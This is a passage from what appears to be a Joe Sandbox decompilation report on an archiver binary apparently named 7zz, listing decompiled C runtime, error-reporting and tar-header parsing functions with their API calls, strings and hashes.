						_t51 = _t79 + 0x490648;
						do {
							__eflags =  *_t51;
							_t57 = _t51;
							if( *_t51 != 0) {
								while(1) {
									_t66 = _t57[1];
									__eflags = _t66;
									if(_t66 == 0) {
										goto L21;
									}
									_t41 =  *_t57 & 0x000000ff;
									_t74 = _t66 & 0x000000ff;
									__eflags = _t41 - _t74;
									if(_t41 <= _t74) {
										_t19 = _v8 + 0x490630; // 0x8040201
										_t68 =  *_t19;
										do {
											 *(_t41 + 0x496341) =  *(_t41 + 0x496341) | _t68;
											_t41 = _t41 + 1;
											__eflags = _t41 - _t74;
										} while (_t41 <= _t74);
									}
									_t57 =  &(_t57[2]);
									__eflags =  *_t57;
									if( *_t57 != 0) {
										continue;
									}
									goto L21;
								}
							}
							L21:
							_v8 = _v8 + 1;
							_t51 =  &(_t51[8]);
							__eflags = _v8 - 4;
						} while (_v8 < 4);
						_t39 = _a4;
						 *0x49623c = 1;
						 *0x496228 = _a4;
						_t40 = E00471A27(_t39);
						_t71 = 0x496230;
						asm("movsd");
						asm("movsd");
						 *0x496444 = _t40;
						asm("movsd");
					}
					goto L31;
				} else {
					L1:
					_t77 = 0;
				}
				L33:
				E0046E5CB(0x19);
				return _t77;
			}
































                                                                      0x0047183b
                                                                      0x00471848
                                                                      0x0047184b
                                                                      0x00471852
                                                                      0x00471855
                                                                      0x0047185e
                                                                      0x00471860
                                                                      0x004719bc
                                                                      0x004719bc
                                                                      0x00471866
                                                                      0x00471866
                                                                      0x00471866
                                                                      0x00471868
                                                                      0x0047186d
                                                                      0x0047186d
                                                                      0x0047186f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00471871
                                                                      0x00471874
                                                                      0x00471875
                                                                      0x0047187a
                                                                      0x00000000
                                                                      0x0047187c
                                                                      0x00471881
                                                                      0x00471889
                                                                      0x0047188a
                                                                      0x0047188c
                                                                      0x004719b3
                                                                      0x004719ba
                                                                      0x004719cb
                                                                      0x004719cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00471892
                                                                      0x00471894
                                                                      0x0047189b
                                                                      0x004718a3
                                                                      0x004718a6
                                                                      0x004718a8
                                                                      0x004718a9
                                                                      0x004718af
                                                                      0x004719a0
                                                                      0x004719a0
                                                                      0x004718b5
                                                                      0x004718b5
                                                                      0x004718b9
                                                                      0x004718bf
                                                                      0x004718c2
                                                                      0x004718c2
                                                                      0x004718c4
                                                                      0x004718c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004718cc
                                                                      0x004718d0
                                                                      0x004718d3
                                                                      0x004718d3
                                                                      0x004718d5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004718db
                                                                      0x004718e2
                                                                      0x004718e2
                                                                      0x00471970
                                                                      0x00471971
                                                                      0x00471975
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00471975
                                                                      0x004718c2
                                                                      0x0047197b
                                                                      0x0047197b
                                                                      0x0047197d
                                                                      0x0047197d
                                                                      0x00471984
                                                                      0x00471985
                                                                      0x00471985
                                                                      0x00471993
                                                                      0x00471998
                                                                      0x00471998
                                                                      0x004719a9
                                                                      0x004719ae
                                                                      0x004719af
                                                                      0x004719b0
                                                                      0x004719c1
                                                                      0x004719c1
                                                                      0x00000000
                                                                      0x004719c1
                                                                      0x0047188c
                                                                      0x00000000
                                                                      0x0047187a
                                                                      0x004718e5
                                                                      0x004718eb
                                                                      0x004718f6
                                                                      0x004718f8
                                                                      0x004718f8
                                                                      0x004718fb
                                                                      0x004718fc
                                                                      0x00471902
                                                                      0x00471902
                                                                      0x00471905
                                                                      0x00471907
                                                                      0x00471909
                                                                      0x00471909
                                                                      0x0047190c
                                                                      0x0047190e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00471910
                                                                      0x00471913
                                                                      0x00471916
                                                                      0x00471918
                                                                      0x0047191d
                                                                      0x0047191d
                                                                      0x00471923
                                                                      0x00471923
                                                                      0x00471929
                                                                      0x0047192a
                                                                      0x0047192a
                                                                      0x00471923
                                                                      0x0047192f
                                                                      0x00471930
                                                                      0x00471933
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00471933
                                                                      0x00471909
                                                                      0x00471935
                                                                      0x00471935
                                                                      0x00471938
                                                                      0x0047193b
                                                                      0x0047193b
                                                                      0x00471941
                                                                      0x00471944
                                                                      0x0047194f
                                                                      0x00471954
                                                                      0x0047195f
                                                                      0x00471964
                                                                      0x00471965
                                                                      0x00471967
                                                                      0x0047196c
                                                                      0x0047196c
                                                                      0x00000000
                                                                      0x00471857
                                                                      0x00471857
                                                                      0x00471857
                                                                      0x00471857
                                                                      0x004719ce
                                                                      0x004719d0
                                                                      0x004719dc

                                                                      APIs
                                                                        • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                        • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                      • GetCPInfo.KERNEL32(00000000,?,?,?,00000000,?,?,0046CFEB), ref: 00471881
                                                                        • Part of subcall function 0046E5CB: LeaveCriticalSection.KERNEL32(?,0046C0D0,00000009,0046C0BC,00000000,?,00000000,00000000,00000000), ref: 0046E5D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterInfoInitializeLeave
                                                                      • String ID: 0bI$0bI$@cI$@cI
                                                                      • API String ID: 1866836854-605000347
                                                                      • Opcode ID: fb2e5454b5c0239ef892e6083fb739233ab4ecf906b078c2986846cff91fd72d
                                                                      • Instruction ID: f7c0c694ad5e617c113d7fbc1e97f9e30d3079020f4ba9ff39ded3c73c8e616e
                                                                      • Opcode Fuzzy Hash: fb2e5454b5c0239ef892e6083fb739233ab4ecf906b078c2986846cff91fd72d
                                                                      • Instruction Fuzzy Hash: 33415CF16042409EEB21DBBDD8917EA7BE09B05314F25C07BD68D862B2C33D494AC74E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046E91E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E0046E91E(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E0046CC80(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E0046E8F1( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00471260("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E004711E0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E00471120(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E00470EE6(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}


















                                                                      0x0046e926
                                                                      0x0046e933
                                                                      0x0046e945
                                                                      0x0046e95b
                                                                      0x00000000
                                                                      0x0046e95b
                                                                      0x0046e97a
                                                                      0x0046ea50
                                                                      0x0046ea54
                                                                      0x0046ea5e
                                                                      0x00000000
                                                                      0x0046ea60
                                                                      0x0046e982
                                                                      0x0046e98e
                                                                      0x0046e990
                                                                      0x0046e990
                                                                      0x0046e994
                                                                      0x0046e99c
                                                                      0x0046e99c
                                                                      0x0046e99e
                                                                      0x0046e99f
                                                                      0x0046e990
                                                                      0x0046e9bb
                                                                      0x0046e9d2
                                                                      0x0046e9de
                                                                      0x0046e9e4
                                                                      0x0046e9e6
                                                                      0x0046e9e6
                                                                      0x0046e9ea
                                                                      0x0046e9f2
                                                                      0x0046e9f2
                                                                      0x0046e9f4
                                                                      0x0046e9f5
                                                                      0x0046e9e6
                                                                      0x0046ea07
                                                                      0x0046e9bd
                                                                      0x0046e9bd
                                                                      0x0046e9bd
                                                                      0x0046ea10
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046ea15
                                                                      0x0046ea1e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046ea20
                                                                      0x0046ea21
                                                                      0x0046ea25
                                                                      0x0046ea27
                                                                      0x0046ea2a
                                                                      0x0046ea30
                                                                      0x0046ea2c
                                                                      0x0046ea2c
                                                                      0x0046ea2c
                                                                      0x0046ea31
                                                                      0x0046ea27
                                                                      0x0046ea39
                                                                      0x0046ea44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046ea65

                                                                      APIs
                                                                      • GetVersionExA.KERNEL32 ref: 0046E93D
                                                                      • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0046E972
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0046E9D2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentFileModuleNameVariableVersion
                                                                      • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                      • API String ID: 1385375860-4131005785
                                                                      • Opcode ID: d2698aefaa4a4e50ff42bfeab236f56def5fb5be9e683bef9c987278d28df3f8
                                                                      • Instruction ID: 26b517cc7216be0e7fa39fd26568a30cb45b6abf2afbf55f3da7e0b56cbc24c7
                                                                      • Opcode Fuzzy Hash: d2698aefaa4a4e50ff42bfeab236f56def5fb5be9e683bef9c987278d28df3f8
                                                                      • Instruction Fuzzy Hash: 54312CB99052446DEB3186B65C857EF37E8AF06304F1404DBE189D5142F5388ECEC71B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401BE5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 77%
                                                                      			E00401BE5(void* __ecx) {
				intOrPtr* _t22;
				char* _t27;
				intOrPtr _t29;
				void* _t45;
				void* _t47;

				E0046B890(E00472D20, _t47);
				_t45 = __ecx;
				L00407CC0( *((intOrPtr*)(__ecx + 0x40)), 0x407ccd);
				_t29 =  *((intOrPtr*)(_t47 + 0xc));
				if(_t29 != 0) {
					E00407CD5( *((intOrPtr*)(__ecx + 0x40)), "Error: ");
					if(_t29 != 1) {
						if(_t29 != 0x8007000e) {
							_t22 = E00401C91(_t47 - 0x18, _t29);
							 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
							E00407CD5( *((intOrPtr*)(__ecx + 0x40)),  *_t22);
							 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
							E00407A18( *((intOrPtr*)(_t47 - 0x18)));
						} else {
							_push("Can\'t allocate required memory");
							goto L5;
						}
					} else {
						_t27 = "Can not open encrypted archive. Wrong password?";
						if( *((char*)(_t47 + 0x10)) == 0) {
							_t27 = "Can not open file as archive";
						}
						_push(_t27);
						L5:
						E00407CD5( *((intOrPtr*)(_t45 + 0x40)));
					}
					L00407CC0( *((intOrPtr*)(_t45 + 0x40)), 0x407ccd);
					 *((intOrPtr*)(_t45 + 0x28)) =  *((intOrPtr*)(_t45 + 0x28)) + 1;
					asm("adc dword [esi+0x2c], 0x0");
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return 0;
			}








                                                                      0x00401bea
                                                                      0x00401bf5
                                                                      0x00401c00
                                                                      0x00401c05
                                                                      0x00401c0a
                                                                      0x00401c14
                                                                      0x00401c1c
                                                                      0x00401c3f
                                                                      0x00401c4d
                                                                      0x00401c57
                                                                      0x00401c5b
                                                                      0x00401c63
                                                                      0x00401c67
                                                                      0x00401c41
                                                                      0x00401c41
                                                                      0x00000000
                                                                      0x00401c41
                                                                      0x00401c1e
                                                                      0x00401c22
                                                                      0x00401c27
                                                                      0x00401c29
                                                                      0x00401c29
                                                                      0x00401c2e
                                                                      0x00401c2f
                                                                      0x00401c32
                                                                      0x00401c32
                                                                      0x00401c71
                                                                      0x00401c76
                                                                      0x00401c7a
                                                                      0x00401c7a
                                                                      0x00401c86
                                                                      0x00401c8e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: Can not open encrypted archive. Wrong password?$Can not open file as archive$Can't allocate required memory$Error:
                                                                      • API String ID: 3519838083-4253456528
                                                                      • Opcode ID: f643b0d77a5193f8bda12cef83a72c641e5637254c1606468349ebd7a63f7bd3
                                                                      • Instruction ID: e96b05d5f5363979fc09c6e311170d97ed88631a387b5d6dedbde536d9aec6cb
                                                                      • Opcode Fuzzy Hash: f643b0d77a5193f8bda12cef83a72c641e5637254c1606468349ebd7a63f7bd3
                                                                      • Instruction Fuzzy Hash: 3D11C431A082049BEB24FA65D485A6F77B4AB44728F10493FE142676D1C7BDA8509B1A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046E383 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0046E383() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x48e060);
				if(_t16 == 0) {
					_t16 = L0046FE93(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x48e060, _t16) == 0) {
						E0046D03C(0x10);
					} else {
						E0046E370(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}






                                                                      0x0046e391
                                                                      0x0046e399
                                                                      0x0046e39d
                                                                      0x0046e3a8
                                                                      0x0046e3ae
                                                                      0x0046e3d8
                                                                      0x0046e3c1
                                                                      0x0046e3c2
                                                                      0x0046e3c8
                                                                      0x0046e3ce
                                                                      0x0046e3d2
                                                                      0x0046e3d2
                                                                      0x0046e3ae
                                                                      0x0046e3df
                                                                      0x0046e3e9

                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000103,7FFFFFFF,0047064B,004710B4,00000000,?,?,00000000,00000001), ref: 0046E385
                                                                      • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0046E393
                                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046E3DF
                                                                        • Part of subcall function 0046FE93: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046FF89
                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046E3B7
                                                                      • GetCurrentThreadId.KERNEL32 ref: 0046E3C8
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                      • String ID:
                                                                      • API String ID: 2020098873-0
                                                                      • Opcode ID: 55fbcf2c7f2f4967b79abaeaadafaeb02b42f847358bd6d886319d930bf8ac5d
                                                                      • Instruction ID: 886707f6ee56ed2fdb0e8759095dced5a20534092e2ad5f091fc19cf1158f84c
                                                                      • Opcode Fuzzy Hash: 55fbcf2c7f2f4967b79abaeaadafaeb02b42f847358bd6d886319d930bf8ac5d
                                                                      • Instruction Fuzzy Hash: BAF062359003219BD7312B32BC0975E3B94EB427A1B10093AF959D67A0EBA888D1869A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046F74E Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 27memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0046F74E(void* _a4) {
				int _t7;
				void* _t13;
				void* _t14;

				_t13 = _a4;
				_t7 = VirtualFree( *(_t13 + 0x10), 0, 0x8000);
				_t14 =  *0x490158 - _t13; // 0x48e138
				if(_t14 == 0) {
					_t7 =  *(_t13 + 4);
					 *0x490158 = _t7;
				}
				if(_t13 == 0x48e138) {
					 *0x48e148 =  *0x48e148 | 0xffffffff;
					return _t7;
				} else {
					 *( *(_t13 + 4)) =  *_t13;
					 *( *_t13 + 4) =  *(_t13 + 4);
					return HeapFree( *0x496580, 0, _t13);
				}
			}






                                                                      0x0046f74f
                                                                      0x0046f75d
                                                                      0x0046f763
                                                                      0x0046f769
                                                                      0x0046f76b
                                                                      0x0046f76e
                                                                      0x0046f76e
                                                                      0x0046f779
                                                                      0x0046f79b
                                                                      0x0046f7a3
                                                                      0x0046f77b
                                                                      0x0046f783
                                                                      0x0046f78a
                                                                      0x0046f79a
                                                                      0x0046f79a

                                                                      APIs
                                                                      • VirtualFree.KERNEL32(000000FF,00000000,00008000,8H,0046F84E,8H,00000000,00000000,00000000,00000000,?,0046F900,00000010,0046C1AA,00000000,?), ref: 0046F75D
                                                                      • HeapFree.KERNEL32(00000000,?,?,0046F900,00000010,0046C1AA,00000000,?), ref: 0046F793
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: Free$HeapVirtual
                                                                      • String ID: 8H$8H$8H
                                                                      • API String ID: 3783212868-3582048164
                                                                      • Opcode ID: ce349bc7234a9fb2b6cb910d916a073b28eb422957feac5cc9b9a7a5f21bd2ef
                                                                      • Instruction ID: a54e31c1f238622790ec37ba6009a3f98b6d7d893c2fccd0110358c51c35deab
                                                                      • Opcode Fuzzy Hash: ce349bc7234a9fb2b6cb910d916a073b28eb422957feac5cc9b9a7a5f21bd2ef
                                                                      • Instruction Fuzzy Hash: 1DF034355006109FD3609F08FC89A467BA1FB48720F11483AF09A9B7A0C771AC80CF88
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00438A2E Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 286COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 75%
                                                                      			E00438A2E(intOrPtr __ecx, signed char* __edx, void* __eflags) {
				void* __esi;
				signed int _t109;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int* _t124;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t140;
				signed int _t143;
				signed int _t146;
				signed int _t150;
				signed int* _t153;
				signed int _t154;
				void* _t156;
				void* _t157;
				signed int* _t176;
				void* _t181;
				void* _t204;
				void* _t219;
				void* _t223;
				void* _t226;
				void* _t227;
				void* _t228;
				intOrPtr _t233;
				signed char** _t240;
				signed int* _t242;
				signed int* _t243;
				void* _t244;
				intOrPtr _t251;
				void* _t253;

				E0046B890(E00478310, _t253);
				_t240 =  *(_t253 + 0xc);
				 *(_t253 + 0xf) =  *(_t253 + 0xf) & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x20)) = __edx;
				_t240[1] = _t240[1] & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x28)) = __ecx;
				 *( *_t240) =  *( *_t240) & 0x00000000;
				 *__edx =  *__edx & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x10)) = 0x200;
				_t109 = E0040FA74(__ecx, _t253 - 0x24c, _t253 - 0x10);
				if(_t109 != 0) {
					L41:
					 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
					return _t109;
				}
				_t251 =  *((intOrPtr*)(_t253 + 8));
				while( *((intOrPtr*)(_t253 - 0x10)) != 0) {
					if( *((intOrPtr*)(_t253 - 0x10)) != 0x200) {
						_push("There is no correct record at the end of archive");
						L12:
						E00409664(_t240);
						L13:
						_t109 = 0;
						goto L41;
					}
					 *((intOrPtr*)(_t251 + 0x68)) =  *((intOrPtr*)(_t251 + 0x68)) + 0x200;
					if(E00438E5B(_t253 - 0x24c) == 0) {
						__eflags =  *(_t253 + 0xf);
						if( *(_t253 + 0xf) == 0) {
							_push(_t251);
							_t219 = 0x64;
							E00438E71(_t253 - 0x24c, _t219);
							_push(_t251 + 0x18);
							_t181 = 8;
							_t114 = E00438E29(_t253 - 0x1e8);
							__eflags = _t114;
							if(_t114 == 0) {
								L26:
								_t109 = 1;
								goto L41;
							}
							_t242 = _t251 + 0x1c;
							_t115 = E00438E29(_t253 - 0x1e0, _t242);
							__eflags = _t115;
							if(_t115 == 0) {
								 *_t242 =  *_t242 & 0x00000000;
								__eflags =  *_t242;
							}
							_t243 = _t251 + 0x20;
							_t116 = E00438E29(_t253 - 0x1d8, _t243);
							__eflags = _t116;
							if(_t116 == 0) {
								 *_t243 =  *_t243 & 0x00000000;
								__eflags =  *_t243;
							}
							__eflags = (((( *(_t253 - 0x1d0) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cf) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ce) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cd) & 0x000000ff) - 0x80000000;
							_t124 = _t251 + 0x10;
							 *(_t253 + 0xc) = _t124;
							if((((( *(_t253 - 0x1d0) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cf) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ce) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cd) & 0x000000ff) != 0x80000000) {
								_push(_t124);
								_t223 = 0xc;
								_t125 = E00438DD3(_t253 - 0x1d0, _t223, _t251);
								__eflags = _t125;
								if(_t125 == 0) {
									goto L26;
								}
								goto L22;
							} else {
								_t176 =  *(_t253 + 0xc);
								 *_t176 = ((( *(_t253 - 0x1c8) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c7) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c6) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c5) & 0x000000ff;
								_t176[1] = ((( *(_t253 - 0x1cc) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1cb) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1ca) & 0x000000ff) << 0x00000008 |  *(_t253 - 0x1c9) & 0x000000ff;
								L22:
								_push(_t251 + 0x24);
								_t127 = E00438E29(_t253 - 0x1c4, 0xc);
								__eflags = _t127;
								if(_t127 == 0) {
									goto L26;
								}
								_t129 = E00438E29(_t253 - 0x1b8, _t253 - 0x24);
								__eflags = _t129;
								if(_t129 == 0) {
									goto L26;
								}
								E0046C5C0(_t253 - 0x1b8,  *0x48d374, _t181);
								 *((char*)(_t251 + 0x5c)) =  *((intOrPtr*)(_t253 - 0x1b0));
								_push(_t251 + 0x30);
								_t226 = 0x64;
								E00438E71(_t253 - 0x1af, _t226);
								_t244 = _t251 + 0x54;
								E0046C5C0(_t244, _t253 - 0x14b, _t181);
								_push(_t251 + 0x3c);
								_t227 = 0x20;
								E00438E71(_t253 - 0x143, _t227);
								_push(_t251 + 0x48);
								_t228 = 0x20;
								_t140 = E00438E71(_t253 - 0x123, _t228);
								__eflags =  *((char*)(_t253 - 0x103));
